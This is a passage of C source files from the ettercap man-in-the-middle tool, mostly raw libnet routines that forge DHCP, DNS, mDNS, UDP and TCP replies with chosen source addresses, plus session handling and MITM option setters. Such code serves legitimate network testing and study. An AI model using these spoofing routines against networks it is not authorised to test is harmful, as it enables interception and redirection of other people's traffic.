ETHERTYPE_IPV6, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); c = libnet_write(l); ON_ERROR(c, -1, "libnet_write: %s", libnet_geterror(l)); libnet_clear_packet(l); SEND_UNLOCK; return c; } #endif /* WITH_IPV6 */ /* * send a dhcp reply to tmac/tip */ int send_dhcp_reply(struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac, u_int8 *dhcp_hdr, u_int8 *options, size_t optlen) { libnet_ptag_t t; int c; libnet_t *l; /* if not lnet warn the developer ;) */ BUG_IF(EC_GBL_IFACE->lnet == 0); l = EC_GBL_IFACE->lnet; SEND_LOCK; /* add the dhcp options */ t = libnet_build_data( options, /* the options */ optlen, /* options len */ l, /* libnet handle */ 0); /* libnet ptag */ ON_ERROR(t, -1, "libnet_build_data: %s", libnet_geterror(l)); /* create the dhcp header */ t = libnet_build_data( dhcp_hdr, /* the header */ LIBNET_DHCPV4_H, /* dhcp len */ l, /* libnet handle */ 0); /* libnet ptag */ ON_ERROR(t, -1, "libnet_build_data: %s", libnet_geterror(l)); /* create the udp header */ t = libnet_build_udp( 67, /* source port */ 68, /* destination port */ LIBNET_UDP_H + LIBNET_DHCPV4_H + optlen, /* packet size */ 0, /* checksum */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ ON_ERROR(t, -1, "libnet_build_udp: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* create the IP header */ t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H + optlen, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_UDP, /* protocol */ 0, /* checksum */ *sip->addr32, /* source IP */ *tip->addr32, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv4: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, ETHERTYPE_IP, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); /* * send the packet to Layer 2 * (sending icmp redirect is not permitted at layer 3) */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * send a mdns reply */ int send_mdns_reply(struct iface_env *iface, u_int16 dport, struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac, u_int16 id, u_int8 *data, size_t datalen, u_int16 anws_rr, u_int16 auth_rr, u_int16 addi_rr) { libnet_ptag_t t; int c, proto, ethertype; libnet_t *l; proto = ntohs(sip->addr_type); /* if not lnet warn the developer ;) */ BUG_IF(iface->lnet == 0); l = iface->lnet; SEND_LOCK; /* create the dns packet */ t = libnet_build_dnsv4( LIBNET_UDP_DNSV4_H, /* TCP or UDP */ id, /* id */ 0x8400, /* standard reply, no error */ 0, /* num_q */ anws_rr, /* num_anws_rr */ auth_rr, /* num_auth_rr */ addi_rr, /* num_addi_rr */ data, datalen, l, /* libnet handle */ 0); /* libnet id */ ON_ERROR(t, -1, "libnet_build_dns: %s", libnet_geterror(l)); /* create the udp header */ t = libnet_build_udp( 5353, /* source port */ htons(dport), /* destination port */ LIBNET_UDP_H + LIBNET_UDP_DNSV4_H + datalen, /* packet size */ 0, /* checksum */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ ON_ERROR(t, -1, "libnet_build_udp: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* create the IP header */ switch (proto) { case AF_INET: { t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_UDP_DNSV4_H + datalen, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP Frag */ 255, /* TTL */ IPPROTO_UDP, /* protocol */ 0, /* checksum */ *sip->addr32, /* source IP */ *tip->addr32, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv4: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* set Ethertype to IPv4 */ ethertype = ETHERTYPE_IP; break; } #ifdef WITH_IPV6 case AF_INET6: { struct libnet_in6_addr src, dst; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); t = libnet_build_ipv6( 0, /* traffic class */ 0, /* flow label */ LIBNET_UDP_H + LIBNET_UDP_DNSV4_H + datalen, /* payload length */ IPPROTO_UDP, /* next header */ 255, /* hop limit */ src, /* source IP */ dst, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv6: %s", libnet_geterror(l)); /* set Ethertype to IPv6 */ ethertype = ETHERTYPE_IPV6; break; } #endif }; /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, ethertype, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); /* send the packet to Layer 2 */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * send a dns reply */ int send_dns_reply(struct iface_env *iface, u_int16 dport, struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac, u_int16 id, u_int8 *data, size_t datalen, u_int16 anws_rr, u_int16 auth_rr, u_int16 addi_rr) { libnet_ptag_t t; int c, proto, ethertype; libnet_t *l; proto = ntohs(sip->addr_type); /* if not lnet warn the developer ;) */ BUG_IF(iface->lnet == 0); l = iface->lnet; SEND_LOCK; /* create the dns packet */ t = libnet_build_dnsv4( LIBNET_UDP_DNSV4_H, /* TCP or UDP */ id, /* id */ 0x8400, /* standard reply, no error */ 1, /* num_q */ anws_rr, /* num_anws_rr */ auth_rr, /* num_auth_rr */ addi_rr, /* num_addi_rr */ data, datalen, l, /* libnet handle */ 0); /* libnet id */ ON_ERROR(t, -1, "libnet_build_dns: %s", libnet_geterror(l)); /* create the udp header */ t = libnet_build_udp( 53, /* source port */ htons(dport), /* destination port */ LIBNET_UDP_H + LIBNET_UDP_DNSV4_H + datalen, /* packet size */ 0, /* checksum */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ ON_ERROR(t, -1, "libnet_build_udp: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* create the IP header */ switch (proto) { case AF_INET: { t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_UDP_DNSV4_H + datalen, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_UDP, /* protocol */ 0, /* checksum */ *sip->addr32, /* source IP */ *tip->addr32, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv4: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* set Ethertype to IPv4 */ ethertype = ETHERTYPE_IP; break; } #ifdef WITH_IPV6 case AF_INET6: { struct libnet_in6_addr src, dst; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); t = libnet_build_ipv6( 0, /* traffic class */ 0, /* flow label */ LIBNET_UDP_H + LIBNET_UDP_DNSV4_H + datalen, /* payload length */ IPPROTO_UDP, /* next header */ 255, /* hop limit */ src, /* source IP */ dst, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv6: %s", libnet_geterror(l)); /* set Ethertype to IPv6 */ ethertype = ETHERTYPE_IPV6; break; } #endif }; /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, ethertype, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); /* send the packet to Layer 2 */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * send an udp packet */ int send_udp(struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac, u_int16 sport, u_int16 dport, u_int8 *payload, size_t length) { libnet_ptag_t t; libnet_t *l; int c, proto, ethertype; proto = ntohs(sip->addr_type); l = EC_GBL_IFACE->lnet; BUG_IF(EC_GBL_IFACE->lnet == 0); SEND_LOCK; /* * libnet_build_udp(uint16_t sp, uint16_t dp, uint16_t len, uint16_t sum, const uint8_t *payload, uint32_t payload_s, libnet_t *l, libnet_ptag_t ptag) */ t = libnet_build_udp( htons(sport), htons(dport), LIBNET_UDP_H + length, 0, payload, length, l, 0); ON_ERROR(t, -1, "libnet_build_udp: %s", libnet_geterror(l)); /* auto calculate checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* create IP header */ switch(proto) { case AF_INET: { t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + length, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP FRAG */ 64, /* TTL */ IPPROTO_UDP, /* protocol */ 0, /* checksum */ *sip->addr32, /* source IP */ *tip->addr32, /* destination IP */ NULL, 0, /* payload size */ l, 0); libnet_toggle_checksum(l, t, LIBNET_ON); /* set Ethertype to IPv4 */ ethertype = ETHERTYPE_IP; break; } #ifdef WITH_IPV6 case AF_INET6: { struct libnet_in6_addr src, dst; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); t = libnet_build_ipv6( 0, /* tc */ 0, /* flow label */ LIBNET_UDP_H + length, /* payload length */ IPPROTO_UDP, /* protocol */ 255, /* hop limit */ src, /* source */ dst, /* destination */ NULL, /* payload */ 0, /* its length */ l, /* handle */ 0); /* ptag */ /* set Ethertype to IPv6 */ ethertype = ETHERTYPE_IPV6; break; } #endif }; ON_ERROR(t, -1, "libnet_build_ipvX: %s", libnet_geterror(l)); /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, ethertype, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); /* send the packet to Layer 3 */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the block */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * send a tcp packet */ int send_tcp(struct ip_addr *sip, struct ip_addr *tip, u_int16 sport, u_int16 dport, u_int32 seq, u_int32 ack, u_int8 flags, u_int8 *payload, size_t length) { libnet_ptag_t t; libnet_t *l; int proto; int c; proto = ntohs(sip->addr_type); l = (proto == AF_INET) ? EC_GBL_LNET->lnet_IP4 : EC_GBL_LNET->lnet_IP6; /* if not lnet warn the developer ;) */ BUG_IF(l == NULL); SEND_LOCK; t = libnet_build_tcp( ntohs(sport), /* source port */ ntohs(dport), /* destination port */ ntohl(seq), /* sequence number */ ntohl(ack), /* acknowledgement num */ flags, /* control flags */ 32767, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + length, /* TCP packet size */ payload, /* payload */ length, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ ON_ERROR(t, -1, "libnet_build_tcp: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* create the IP header */ switch(proto) { case AF_INET: { t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ *sip->addr32, /* source IP */ *tip->addr32, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); libnet_toggle_checksum(l, t, LIBNET_ON); break; } #ifdef WITH_IPV6 case AF_INET6: { struct libnet_in6_addr src, dst; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); t = libnet_build_ipv6( 0, /* tc */ 0, /* flow label */ LIBNET_TCP_H, /* payload length */ IPPROTO_TCP, /* protocol */ 255, /* hop limit */ src, /* source address */ dst, /* destination address */ NULL, /* payload */ 0, /* its length */ l, /* handle */ 0); /* ptag */ break; } #endif }; ON_ERROR(t, -1, "libnet_build_ipvX: %s", libnet_geterror(l)); /* send the packet to Layer 3 */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * similar to send_tcp but the user can specify the destination mac addresses */ int send_tcp_ether(u_int8 *dmac, struct ip_addr *sip, struct ip_addr *tip, u_int16 sport, u_int16 dport, u_int32 seq, u_int32 ack, u_int8 flags) { libnet_ptag_t t; int c, proto, ethertype; libnet_t *l; proto = ntohs(sip->addr_type); /* if not lnet warn the developer ;) */ BUG_IF(EC_GBL_IFACE->lnet == 0); l = EC_GBL_IFACE->lnet; SEND_LOCK; t = libnet_build_tcp( ntohs(sport), /* source port */ ntohs(dport), /* destination port */ ntohl(seq), /* sequence number */ ntohl(ack), /* acknowledgement num */ flags, /* control flags */ 32767, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H, /* TCP packet size */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ ON_ERROR(t, -1, "libnet_build_tcp: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); switch (proto) { case AF_INET: { /* create the IP header */ t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ *sip->addr32, /* source IP */ *tip->addr32, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv4: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* set Ethertype to IPv4 */ ethertype = ETHERTYPE_IP; break; } #ifdef WITH_IPV6 case AF_INET6: { struct libnet_in6_addr src, dst; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); t = libnet_build_ipv6( 0, /* traffic class */ 0, /* flow label */ LIBNET_TCP_H, /* payload length */ IPPROTO_TCP, /* next header */ 255, /* hop limit */ src, /* source IP */ dst, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv6: %s", libnet_geterror(l)); /* set Ethertype to IPv6 */ ethertype = ETHERTYPE_IPV6; break; } #endif } /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, dmac, ethertype, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); /* send the packet to Layer 3 */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_services.c000664 000000 000000 00000005522 13711276346 016713 0ustar00rootroot000000 000000 /* ettercap -- services list module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ static SLIST_HEAD(, entry) serv_head; struct entry { u_int32 serv; u_int16 proto; char *name; SLIST_ENTRY(entry) next; }; /* protos */ static void discard_servdb(void); int services_init(void); char * service_search(u_int32 serv, u_int8 proto); /*****************************************/ static void discard_servdb(void) { struct entry *l; while (SLIST_FIRST(&serv_head) != NULL) { l = SLIST_FIRST(&serv_head); SLIST_REMOVE_HEAD(&serv_head, next); SAFE_FREE(l->name); SAFE_FREE(l); } DEBUG_MSG("ATEXIT: discard_servdb"); return; } int services_init(void) { struct entry *s; FILE *f; char line[128]; char name[32]; char type[8]; u_int serv; u_int8 proto; int i = 0; /* errors are handled by the function */ f = open_data("share", SERVICES_NAMES, FOPEN_READ_TEXT); ON_ERROR(f, NULL, "Cannot open %s", SERVICES_NAMES); while (fgets(line, 80, f) != 0) { if (sscanf(line, "%31s%u/%7s", name, &serv, type) != 3) continue; /* only tcp and udp services */ if (!strcmp(type, "tcp")) proto = NL_TYPE_TCP; else if (!strcmp(type, "udp")) proto = NL_TYPE_UDP; else continue; /* skip comments */ if (strstr(name, "#")) continue; SAFE_CALLOC(s, 1, sizeof(struct entry)); s->name = strdup(name); s->serv = htons(serv); s->proto = proto; SLIST_INSERT_HEAD(&serv_head, s, next); i++; } DEBUG_MSG("serv_init -- %d services loaded", i); USER_MSG("%4d known services\n", i); fclose(f); atexit(discard_servdb); return i; } /* * search for a service and * return its name */ char * service_search(u_int32 serv, u_int8 proto) { struct entry *s; SLIST_FOREACH(s, &serv_head, next) { if (s->serv == serv && s->proto == proto) return (s->name); } /* empty name for unknown services */ return ""; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_session.c000664 000000 000000 00000014451 13711276346 016554 0ustar00rootroot000000 000000 /* ettercap -- session management Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #define TABBIT 10 /* 2^10 bit tab entries: 1024 LISTS */ #define TABSIZE (1 << TABBIT) #define TABMASK (TABSIZE - 1) /* globals */ struct session_list { time_t ts; struct ec_session *s; LIST_ENTRY (session_list) next; }; /* global data */ static LIST_HEAD(, session_list) session_list_head[TABSIZE]; /* protos */ u_int32 session_hash(void *ident, size_t ilen); static pthread_mutex_t session_mutex = PTHREAD_MUTEX_INITIALIZER; #define SESSION_LOCK do{ pthread_mutex_lock(&session_mutex); } while(0) #define SESSION_UNLOCK do{ pthread_mutex_unlock(&session_mutex); } while(0) /************************************************/ /* * create a session if it does not exits * update a session if it already exists * * also check for timeouted session and remove them */ void session_put(struct ec_session *s) { struct session_list *sl, *tmp = NULL; time_t ti = time(NULL); u_int32 h; SESSION_LOCK; /* calculate the hash */ h = session_hash(s->ident, s->ident_len); /* search if it already exist */ LIST_FOREACH_SAFE(sl, &session_list_head[h], next, tmp) { if ( sl->s->match(sl->s->ident, s->ident) ) { DEBUG_MSG("session_put: [%p] updated", sl->s->ident); /* destroy the old session */ session_free(sl->s); /* link the new session */ sl->s = s; /* renew the timestamp */ sl->ts = ti; SESSION_UNLOCK; return; } if (sl->ts < (ti - EC_GBL_CONF->connection_timeout) ) { DEBUG_MSG("session_put: [%p] timeouted", sl->s->ident); session_free(sl->s); LIST_REMOVE(sl, next); SAFE_FREE(sl); } } /* sanity check */ BUG_IF(s->match == NULL); /* create the element in the list */ SAFE_CALLOC(sl, 1, sizeof(struct session_list)); /* the timestamp */ sl->ts = ti; /* link the session */ sl->s = s; DEBUG_MSG("session_put: [%p] new session", sl->s->ident); /* * put it in the head. * it is likely to be retrived early */ LIST_INSERT_HEAD(&session_list_head[h], sl, next); SESSION_UNLOCK; } /* * get the info contained in a session */ int session_get(struct ec_session **s, void *ident, size_t ident_len) { struct session_list *sl; time_t ti = time(NULL); u_int32 h; SESSION_LOCK; /* calculate the hash */ h = session_hash(ident, ident_len); /* search if it already exist */ LIST_FOREACH(sl, &session_list_head[h], next) { if ( sl->s->match(sl->s->ident, ident) ) { //DEBUG_MSG("session_get: [%p]", sl->s->ident); /* return the session */ *s = sl->s; /* renew the timestamp */ sl->ts = ti; SESSION_UNLOCK; return E_SUCCESS; } } SESSION_UNLOCK; return -E_NOTFOUND; } /* * delete a session */ int session_del(void *ident, size_t ident_len) { struct session_list *sl; u_int32 h; SESSION_LOCK; /* calculate the hash */ h = session_hash(ident, ident_len); /* search if it already exist */ LIST_FOREACH(sl, &session_list_head[h], next) { if ( sl->s->match(sl->s->ident, ident) ) { DEBUG_MSG("session_del: [%p]", sl->s->ident); /* free the session */ session_free(sl->s); /* remove the element in the list */ LIST_REMOVE(sl, next); /* free the element in the list */ SAFE_FREE(sl); SESSION_UNLOCK; return E_SUCCESS; } } SESSION_UNLOCK; return -E_NOTFOUND; } /* * get the info and delete the session * atomic operations */ int session_get_and_del(struct ec_session **s, void *ident, size_t ident_len) { struct session_list *sl; u_int32 h; SESSION_LOCK; /* calculate the hash */ h = session_hash(ident, ident_len); /* search if it already exist */ LIST_FOREACH(sl, &session_list_head[h], next) { if ( sl->s->match(sl->s->ident, ident) ) { DEBUG_MSG("session_get_and_del: [%p]", sl->s->ident); /* return the session */ *s = sl->s; /* remove the element in the list */ LIST_REMOVE(sl, next); /* free the element in the list */ SAFE_FREE(sl); SESSION_UNLOCK; return E_SUCCESS; } } SESSION_UNLOCK; return -E_NOTFOUND; } /* * free a session structure */ void session_free(struct ec_session *s) { DEBUG_MSG("session_free: [%p] deleted", s->ident); SAFE_FREE(s->ident); /* call the cleanup function to free pointers in the data portion */ if (s->free) s->free(s->data, s->data_len); /* data is free'd here, don't free it in the s->free function */ SAFE_FREE(s->data); SAFE_FREE(s); } /* * calculate the hash for an ident. * use a IP-like checksum so if some word will be exchanged * the hash will be the same. it is useful for dissectors * to find the same session if the packet is goint to the * server or to the client. */ u_int32 session_hash(void *ident, size_t ilen) { u_int32 hash = 0; u_int16 *buf = (u_int16 *)ident; while(ilen > 1) { hash += *buf++; ilen -= sizeof(u_int16); } if (ilen == 1) hash += htons(*(u_char *)buf << 8); hash = (hash >> 16) + (hash & 0xffff); hash += (hash >> 16); /* the hash must be within the TABSIZE */ return (u_int16)(~hash) & TABMASK; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_set.c000664 000000 000000 00000013232 13711276346 015660 0ustar00rootroot000000 000000 /* ettercap -- Set functions, for library and UI support Copyright (C) Ettercap Development Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #ifdef HAVE_EC_LUA #include #endif #include /* set functions */ void set_mitm(char *mitm) { EC_GBL_OPTIONS->mitm = 1; if(mitm_set(mitm) != E_SUCCESS) FATAL_ERROR("MiTM method '%s' not supported...\n", mitm); } void set_onlymitm(void) { EC_GBL_OPTIONS->only_mitm = 1; } void set_broadcast(void) { EC_GBL_OPTIONS->broadcast = 1; } void set_iface_bridge(char *iface) { EC_GBL_OPTIONS->iface_bridge = strdup(iface); set_bridge_sniff(); } void set_promisc(void) { EC_GBL_PCAP->promisc = 0; } void set_reversed(void) { EC_GBL_OPTIONS->reversed = 1; } void set_plugin(char *name) { struct plugin_list *plugin, *tmp; if(!strcasecmp(name, "list")) { plugin_list(); clean_exit(0); } /* check if plugin name is a duplicate */ LIST_FOREACH_SAFE(plugin, &EC_GBL_OPTIONS->plugins, next, tmp) if (!strcmp(plugin->name, name)) return; SAFE_CALLOC(plugin, 1, sizeof(struct plugin_list)); plugin->name = strdup(name); plugin->exists = true; LIST_INSERT_HEAD(&EC_GBL_OPTIONS->plugins, plugin, next); } void set_plugin_list(char *list) { char *tmp, *p, *plugin; p = list; while((plugin = ec_strtok(p, ",", &tmp))) { if (plugin) { set_plugin(plugin); p = NULL; } else break; } SAFE_FREE(list); } void set_proto(char *proto) { EC_GBL_OPTIONS->proto = strdup(proto); } void set_iface(char *iface) { EC_GBL_OPTIONS->iface = strdup(iface); } void set_lifaces(void) { #ifndef JUST_LIBRARY EC_GBL_OPTIONS->lifaces = 1; #endif } void set_secondary(char *iface) { EC_GBL_OPTIONS->secondary = parse_iflist(iface); } void set_netmask(char *netmask) { EC_GBL_OPTIONS->netmask = strdup(netmask); } void set_address(char *address) { EC_GBL_OPTIONS->address = strdup(address); } void set_read_pcap(char *pcap_file) { /* we don't want to scan th eLAN while reading from file */ EC_GBL_OPTIONS->silent = 1; EC_GBL_OPTIONS->read = 1; EC_GBL_OPTIONS->pcapfile_in = strdup(pcap_file); } void set_write_pcap(char *pcap_file) { EC_GBL_OPTIONS->write = 1; EC_GBL_OPTIONS->pcapfile_out = strdup(pcap_file); } void set_pcap_filter(char *filter) { EC_GBL_PCAP->filter = strdup(filter); } void set_filter(char *end, const char *filter) { uint8_t f_enabled = 1; if ( (end-filter >=2) && *(end-2) == ':') { *(end-2) = '\0'; f_enabled = !( *(end-1) == '0' ); } if (filter_load_file(filter, EC_GBL_FILTERS, f_enabled) != E_SUCCESS) FATAL_ERROR("Cannot load filter file \"%s\"", filter); } void set_loglevel_packet(char *arg) { if (set_loglevel(LOG_PACKET, arg) == -E_FATAL) clean_exit(-E_FATAL); } void set_loglevel_info(char *arg) { if (set_loglevel(LOG_INFO, arg) == -E_FATAL) clean_exit(-E_FATAL); } void set_loglevel_true(char *arg) { if (set_msg_loglevel(LOG_TRUE, arg) == -E_FATAL) clean_exit(-E_FATAL); } void set_compress(void) { EC_GBL_OPTIONS->compress = 1; } void opt_set_regex(char *regex) { if (set_regex(regex) == -E_FATAL) clean_exit(-E_FATAL); } void set_superquiet() { EC_GBL_OPTIONS->superquiet = 1; } void set_quiet(void) { EC_GBL_OPTIONS->quiet = 1; } void set_script(char *script) { EC_GBL_OPTIONS->script = strdup(script); } void set_silent(void) { EC_GBL_OPTIONS->silent = 1; } #ifdef WITH_IPV6 void set_ip6scan(void) { EC_GBL_OPTIONS->ip6scan = 1; } #endif void set_unoffensive(void) { EC_GBL_OPTIONS->unoffensive = 1; } void disable_sslmitm(void) { EC_GBL_OPTIONS->ssl_mitm = 0; } void set_resolve(void) { EC_GBL_OPTIONS->resolve = 1; resolv_thread_init(); atexit(resolv_thread_fini); } void set_load_hosts(char *file) { EC_GBL_OPTIONS->silent = 1; EC_GBL_OPTIONS->load_hosts = 1; EC_GBL_OPTIONS->hostsfile = strdup(file); } void set_save_hosts(char *file) { EC_GBL_OPTIONS->save_hosts = 1; EC_GBL_OPTIONS->hostsfile = strdup(file); } void opt_set_format(char *format) { if (set_format(format) != E_SUCCESS) clean_exit(-E_FATAL); } void set_ext_headers(void) { EC_GBL_OPTIONS->ext_headers = 1; } void set_wifi_key(char *key) { wifi_key_prepare(key); } void set_conf_file(char *file) { EC_GBL_CONF->file = strdup(file); } void set_ssl_cert(char *cert) { EC_GBL_OPTIONS->ssl_cert = strdup(cert); } void set_ssl_key(char *key) { EC_GBL_OPTIONS->ssl_pkey = strdup(key); } #ifdef HAVE_EC_LUA void set_lua_args(char *args) { ec_lua_cli_add_args(strdup(args)); } void set_lua_script(char *script) { ec_lua_cli_add_script(strdup(script)); } #endif void set_target_target1(char *target1) { EC_GBL_OPTIONS->target1 = strdup(target1); } void set_target_target2(char *target2) { EC_GBL_OPTIONS->target2 = strdup(target2); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_signals.c000664 000000 000000 00000015200 13711276346 016522 0ustar00rootroot000000 000000 /* ettercap -- signal handler Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #ifdef HAVE_EC_LUA #include #endif #ifndef OS_WINDOWS #include #include #endif typedef void handler_t(int); /* protos */ void signal_handler(void); static handler_t *signal_handle(int signo, handler_t *handler, int flags); static void signal_SEGV(int sig); static void signal_TERM(int sig); static void signal_CHLD(int sig); static void signal_USR1(int sig); /*************************************/ void signal_handler(void) { DEBUG_MSG("signal_handler activated"); // fixing windows warnings (void) signal_SEGV; (void) signal_CHLD; #ifdef SIGSEGV signal_handle(SIGSEGV, signal_SEGV, 0); #endif #ifdef SIGBUS signal_handle(SIGBUS, signal_SEGV, 0); #endif #ifdef SIGINT signal_handle(SIGINT, signal_TERM, 0); #endif #ifdef SIGTERM signal_handle(SIGTERM, signal_TERM, 0); #endif #ifdef SIGCHLD signal_handle(SIGCHLD, signal_CHLD, 0); #endif #ifdef SIGPIPE /* needed by sslwrap */ signal_handle(SIGPIPE, SIG_IGN, 0); #endif #ifdef SIGALRM /* needed by solaris */ signal_handle(SIGALRM, SIG_IGN, 0); #endif 